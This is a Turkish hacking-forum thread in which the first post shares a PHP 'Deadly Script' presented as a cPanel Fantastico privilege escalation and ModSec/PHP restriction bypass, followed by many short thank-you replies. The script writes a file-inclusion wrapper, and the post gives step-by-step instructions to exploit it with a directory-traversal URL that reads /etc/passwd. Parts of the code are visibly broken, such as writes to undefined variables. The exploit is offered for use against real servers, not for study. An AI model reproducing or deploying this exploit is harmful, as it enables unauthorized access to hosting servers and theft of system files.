ModSec PHP restriction Bypass Shell (1 Viewer)

[deleted-user]

Merhabalar , araplarin yazdigi bir tools kullanimi shellde mevcut . eski tools belki işe yarar denemedim ama illaki açık olan sunucu mevcuttur.

<?php
/*
########################################
# Deadly Script by Super-Crystal
# bypass Cpanel fantastico
# www.arab4services.net
# ##e-mail : l1un (at) hotmail (dot) com [email concealed] , i-1 (at) hotmail (dot) com [email concealed]##
#######################################
*/
set_time_limit(0);
if(isset($_POST['sup3r'])) {
if(stristr(php_uname(),"2.6.") && stristr(php_uname(),"Linux")) {
$phpwrapper = '<?php
include_once("./language/".$_GET[sup3r].".php");
?>
';
fwrite($h,$prctl);
fclose($h);
$handle = fopen($_POST['php'], "w");
fwrite($handle, $phpwrapper);
fclose($handle);
echo "Building exploit...<br />";
echo "coding by Super-Crystal <br />";
echo "Cleaning up<br />";
echo "Done!<br />
</pre>";
} else {
echo "error : ".php_uname();
}
} else {
?>
<div align="center">
<h3>Deadly Script</h3>
<font color=red>Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"</font><br />
<pre><div align="center">
</pre></div><br />
<table border="0" cellspacing="0">
<tr>
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
<table border="0" cellspacing="0">
<tr>
<td><div align="right">Exploit:</div></td>
<td>
<select name="exploit">
<option selected="selected">Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"</option>
</select>
</td>
</tr>
<tr>
<td><div align="right">change</div></td>
<td><input type="text" name="php" size="50" value="<?php echo getcwd()."/language.php" ?>" /></td>
</tr>
<tr>
</table>
</div>
<input type="hidden" name="sup3r" value="doit" />
<input name="submit" type="submit" value="Submit" /><br />
1- change /home/[user]/.fantasticodata/language.php
<br />
2- click on the submit
<br />
3- now put it like this (e.g)
: http://www.xxxx.com:2082/frontend/x3/fantastico/index.php?sup3r=../../..
/../../../etc/passwd%00 .
<br />
<font color=red>Written: 10.10.2008</font><br />
<font color=blue>Public: 26.11.2008</font><br />
<div align="center">
<font color=red>Author : Super-Crystal</font><br />
<a href="http://www.arab4services.net">Arab4services.net </a></center>
</div>
</form>
<?php } ?>

 

[El Behram]

thank you babby

 

[l0rxhell]

araplar gına geldi adamların toolarını kullana kullana .d eline saglık bu arada

 

[Mikrex]

Thank you

 

[mstbro]

eyvallah atalım kenara dursun

 

[KARADAY1]

Bakacam

 

[volkan01]

ellerine saglık

 

[WorthLess]

Hicbişey anlamadım ama arap toolsu diye alıcam

 

[GhostHacker]

Bakalım

 

[Virtualw0rm]

Arapları severim privleri sağlam diye biliyorum

 

[goat123]

Thank you

 

[DotX]

tşkler

 

[KinqDeep]

eline sağlık

 

[massri]

thnxxxxxxxxxxxxxxxxxxxx

 

[khanhcloud]

thankx

 

[by_mithat]

ellerine saglık

 

[Edizyco]

yararlı

 

[babogi]

thnxxx

 

[Cracker King]

teşekkürler

 

[Mitnick]

Bakalım

 

[egyshell]

Thank you

 

[Xcannon]

Ilgi cekiyor

 

[MrMagooo]

Nice thanks!

 

[ULUSOKAK]

Tsk ederim yararlı

 

[R00tSLayer]

thnx

 

[S4F3TYF4]

Bakalim

 

[God3err]

bakalım

 

[zeroD4y]

bakalım

 

[by_dadaş]

eyv

 

[rootkit]

teskkrler bakalım